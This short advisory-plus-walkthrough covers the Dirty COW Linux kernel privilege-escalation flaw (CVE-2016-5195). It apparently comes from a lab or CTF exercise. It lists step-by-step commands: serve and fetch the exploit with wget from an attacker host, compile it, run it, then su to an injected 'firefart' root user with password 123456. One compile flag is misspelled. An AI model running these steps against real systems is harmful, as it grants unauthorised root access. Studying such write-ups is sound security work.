Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Affected systems: Linux kernel 2.x through 4.x before 4.8.3

https://nvd.nist.gov/vuln/detail/CVE-2016-5195

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195

Exploit

1. Scan the host too see if this is vulnerable to DirtyCow

  • ./linux-exploit-suggester

Kernel version: 3.2.0

Exploit status: Highly probable

2. Download the exploit

// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):

// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

3. Upload the exploit into the attacked machine

  • python -m SimpleHTTPServer 9990

  • wget http://10.10.14.14:9990/40839

4. In the contents of the script there is the compile instruction

  • Find the compile instructions
    • cat 40839 dirty.c
  • Rename the script
    • mv 40839 dirty.c
  • gcc -pthreat dirty.c -o dirty -lcrypt
  • ls -l dirty

5. Run the script

  • ./dirty

6. Test the exploit by changing to the user firefart using su

  • su firefart
    • 123456

  • cat /etc/passwd | head -n 5

There is the user with all root privileges

Solution

The vendor has issued a source code fix